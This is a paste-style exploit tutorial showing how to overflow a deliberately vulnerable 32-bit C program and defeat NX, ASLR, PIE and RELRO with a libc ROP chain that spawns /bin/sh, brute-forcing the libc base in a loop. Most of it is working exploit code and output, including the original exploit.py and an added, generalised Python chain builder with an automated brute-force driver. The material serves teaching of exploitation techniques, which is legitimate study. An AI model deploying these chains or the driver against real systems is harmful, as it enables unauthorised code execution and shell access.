Make ROP with BruteForce, bypass NX, ASLR, PIE, RELRO

a guest, Dec 1st, 2011

Vulnerable binary (a deliberately unbounded copy of argv[1] into a 32-byte stack buffer):

[jonathan@Archlinux rop-bf]$ cat main.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
  char buff[32];

  /* unbounded copy: an argv[1] longer than 32 bytes overruns buff and
     overwrites the saved return address of main */
  strcpy(buff, argv[1]);

  return (0);
}

Compiled with "gcc -o main main.c -pie"

PIE    enabled
ASLR   enabled
NX     enabled
RELRO  full
  27.  
Search for gadgets in the binary with ROPgadget (v3 syntax shown; current releases take "--binary ./main" instead of "-file ./main"). Because the binary is PIE, the addresses are offsets from a base that ASLR picks at every run:

[jonathan@Archlinux rop-bf]$ ROPgadget -file ./main -g
Gadgets information
============================================================
0x000003e6: pop %edi | ret
0x00000405: add $0x08,%esp | pop %ebx | ret
0x00000408: pop %ebx | ret
0x00000492: mov (%esp),%ebx | ret
0x0000051c: pop %ebx | pop %esi | pop %ebp | ret
0x0000051e: pop %ebp | ret
0x0000054f: call *%eax
0x00000551: add $0x14,%esp | pop %ebx | pop %ebp | ret
0x00000554: pop %ebx | pop %ebp | ret
0x00000595: mov $0x81ffffff,%esi | ret
0x000005ec: pop %ebx | pop %esi | pop %edi | pop %ebp | ret

Unique gadgets found: 11


Damn, only 11 gadgets found, and none of them writes memory or issues a syscall. :/


So instead we take the gadgets from /lib/libc.so.6 and brute-force its base address. The chain then needs nothing from the PIE binary at all, and full RELRO is irrelevant because the chain never touches the GOT: the only unknown left is the address at which ASLR mapped libc.
  52.  
  53.  
Exploit. The chain writes "/bin//sh" followed by a NULL dword into libc's .data with a "pop %eax" / "mov %eax,(%ecx)" primitive, then sets eax = 11 (execve) with xor plus eleven inc, loads ebx = &"/bin//sh" and ecx = edx = &NULL, and traps into the kernel. base_addr is a fixed guess of where ASLR will map libc, and the gadget offsets are specific to the author's libc build. The payload travels through argv and strcpy, so it must contain no NUL byte; with this base none of the addresses does, and the "//" in "/bin//sh" keeps every 4-byte chunk NUL-free.

[jonathan@Archlinux rop-bf]$ cat exploit.py
#!/usr/bin/python2

from struct import pack

base_addr = 0xb770a000   # guessed libc base; correct only on the run where ASLR picks it

p = "a" * 44             # 32-byte buff plus frame, up to the saved return address
# execve /bin/sh generated by RopGadget v3.3
p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
p += pack("<I", 0x42424242) # padding
p += pack("<I", base_addr + 0x00178020)  # @ .data
p += pack("<I", 0x42424242) # padding
p += pack("<I", base_addr + 0x00025baf) # pop %eax | ret
p += "/bin"
p += pack("<I", base_addr + 0x0006c8ba) # mov %eax,(%ecx) | ret
p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
p += pack("<I", 0x42424242) # padding
p += pack("<I", base_addr + 0x00178020 + 4) # @ .data + 4
p += pack("<I", 0x42424242) # padding
p += pack("<I", base_addr + 0x00025baf) # pop %eax | ret
p += "//sh"
p += pack("<I", base_addr + 0x0006c8ba) # mov %eax,(%ecx) | ret
p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
p += pack("<I", 0x42424242) # padding
p += pack("<I", base_addr + 0x00178020 + 8) # @ .data + 8
p += pack("<I", 0x42424242) # padding
p += pack("<I", base_addr + 0x00030bb0) # xor %eax,%eax | ret  (NULL terminator without a NUL byte in the payload)
p += pack("<I", base_addr + 0x0006c8ba) # mov %eax,(%ecx) | ret
p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
p += pack("<I", 0x42424242) # padding
p += pack("<I", 0x42424242) # padding
p += pack("<I", base_addr + 0x00178020) # @ .data
p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
p += pack("<I", 0x42424242) # padding
p += pack("<I", base_addr + 0x00178020 + 8) # @ .data + 8  (ecx = argv -> NULL)
p += pack("<I", base_addr + 0x00178020) # @data          (ebx = "/bin//sh")
p += pack("<I", base_addr + 0x00001a9e) # pop %edx | ret
p += pack("<I", base_addr + 0x00178020 + 8) # @ .data + 8  (edx = envp -> NULL)
p += pack("<I", base_addr + 0x00030bb0) # xor %eax,%eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret  (eax = 11 = execve)
p += pack("<I", base_addr + 0x0002dc45) # int $0x80

print p

  110.  
  111.  
  112.  
Now brute-force the libc base: run the target with the same payload until ASLR happens to map libc at the guessed address. Every wrong guess segfaults; the right one reaches execve and the loop blocks on the interactive shell (the trailing newline that print adds is stripped by "$(...)"). This is practical only because the 32-bit mmap base carries about 8 bits of randomness (256 page-aligned candidates by default, so a fixed guess hits after a few hundred runs on average); a 64-bit libc gets 28 or more random bits, and the same approach is out of reach there.


[jonathan@Archlinux rop-bf]$ while true ; do ./main "$(./exploit.py)" ; done
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
[...]
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
sh-4.2$
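The exploit above hard-codes one chain for one base. The following is an added example (this editor's code, not the paste's exploit.py) that builds the same execve chain for any guessed libc base, refuses a payload that a NUL byte would truncate in argv or strcpy, and re-runs the target until the guess is right, stopping when the child does not die of SIGSEGV. It reuses the gadget and .data offsets exploit.py prints for the author's libc build; against any other libc those offsets must be re-extracted with ROPgadget. The names Chain, build_payload, brute_force and run_target, the path-padding rule and the driver are this example's own construction; the 44-byte overflow length is the one exploit.py uses.

```python
"""execve("/bin/sh") ROP chain builder and brute-force driver for the paste's
32-bit target. Added example, not the paste's exploit.py: the gadget and .data
offsets are the ones exploit.py uses for the author's libc build and must be
re-extracted (e.g. with ROPgadget) for any other libc; the function names,
the NUL-byte check and the driver are this example's own construction."""
import signal
import subprocess
import sys
from struct import pack

GADGETS = {  # libc-relative offsets, copied from the paste's exploit.py
    "pop_edx_ecx_ebx": 0x000E07C1,  # pop %edx | pop %ecx | pop %ebx | ret
    "pop_eax": 0x00025BAF,          # pop %eax | ret
    "mov_eax_to_ecx": 0x0006C8BA,   # mov %eax,(%ecx) | ret
    "xor_eax": 0x00030BB0,          # xor %eax,%eax | ret
    "inc_eax": 0x00026632,          # inc %eax | ret
    "int80": 0x0002DC45,            # int $0x80
}
DATA_OFF = 0x00178020  # writable .data slot inside libc, used as scratch
SYS_EXECVE = 11        # i386 syscall number of execve
PAD = 0x42424242       # filler for registers the chain does not care about
BAD_BYTES = b"\x00"    # strcpy and argv both stop at NUL, so none may appear


def pad_path(path):
    """Prepend '/' until the length is a multiple of 4 so every 4-byte chunk
    is NUL-free ('//bin/sh' resolves like '/bin/sh'; the paste used '/bin//sh')."""
    if not path.startswith(b"/"):
        raise ValueError("absolute path required")
    while len(path) % 4:
        path = b"/" + path
    return path


class Chain:
    """Stack words of the chain for one guess of the libc base."""

    def __init__(self, base):
        self.base = base
        self.words = []

    def gadget(self, name):
        return self.base + GADGETS[name]

    def write_dword(self, addr, value):
        # ecx <- addr, then eax <- value (xor for 0, so no NUL lands on the stack)
        self.words += [self.gadget("pop_edx_ecx_ebx"), PAD, addr, PAD]
        self.words += [self.gadget("xor_eax")] if value == 0 else [self.gadget("pop_eax"), value]
        self.words += [self.gadget("mov_eax_to_ecx")]

    def execve(self, path=b"/bin/sh"):
        """execve(path, &NULL, &NULL): write the string and a NULL dword into
        .data, load ebx/ecx/edx, set eax = 11 and trap into the kernel."""
        path, data = pad_path(path), self.base + DATA_OFF
        for i in range(0, len(path), 4):
            self.write_dword(data + i, int.from_bytes(path[i:i + 4], "little"))
        null = data + len(path)
        self.write_dword(null, 0)
        self.words += [self.gadget("pop_edx_ecx_ebx"), null, null, data]  # edx, ecx, ebx
        self.words += [self.gadget("xor_eax")] + [self.gadget("inc_eax")] * SYS_EXECVE
        self.words += [self.gadget("int80")]
        return self

    def to_bytes(self):
        return b"".join(pack("<I", w & 0xFFFFFFFF) for w in self.words)


def find_bad_bytes(payload, bad=BAD_BYTES):
    """Offsets of bytes that would truncate the payload in strcpy/argv."""
    return [i for i, b in enumerate(payload) if b in bad]


def build_payload(base, overflow_len=44, path=b"/bin/sh"):
    """44 filler bytes reach the saved return address in the paste's binary."""
    payload = b"A" * overflow_len + Chain(base).execve(path).to_bytes()
    bad = find_bad_bytes(payload)
    if bad:
        raise ValueError("NUL byte at offsets %r: this base is unusable" % bad)
    return payload


def brute_force(run_once, max_tries):
    """Repeat run_once() until it reports success; returns the attempt count."""
    for attempt in range(1, max_tries + 1):
        if run_once():
            return attempt
    return None


def run_target(target, payload):
    """One attempt: a wrong base segfaults; anything else counts as success.
    stdin/stdout are inherited, so a spawned shell is interactive."""
    return subprocess.run([target, payload]).returncode != -signal.SIGSEGV


if __name__ == "__main__":  # ./ropbf.py [./main [libc_base_hex]]
    base = int(sys.argv[2], 16) if len(sys.argv) > 2 else 0xB770A000
    payload = build_payload(base)
    if len(sys.argv) > 1:
        tries = brute_force(lambda: run_target(sys.argv[1], payload), 4096)
        print("shell after %s attempts" % tries, file=sys.stderr)
    else:  # no target given: emit the raw payload for the while-true loop
        sys.stdout.buffer.write(payload)
```

Run it with no arguments to get the raw payload (a drop-in for the while-true loop above), or pass ./main and optionally a base in hex to let the script do the looping; the attempt count it reports is a direct measurement of how much entropy the brute force actually had to overcome.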
  131.  
New feature in a future ROPgadget: ROPmaker for brute-forcing libc


- http://shell-storm.org/project/ROPgadget/

@jonathansalwan

  139.  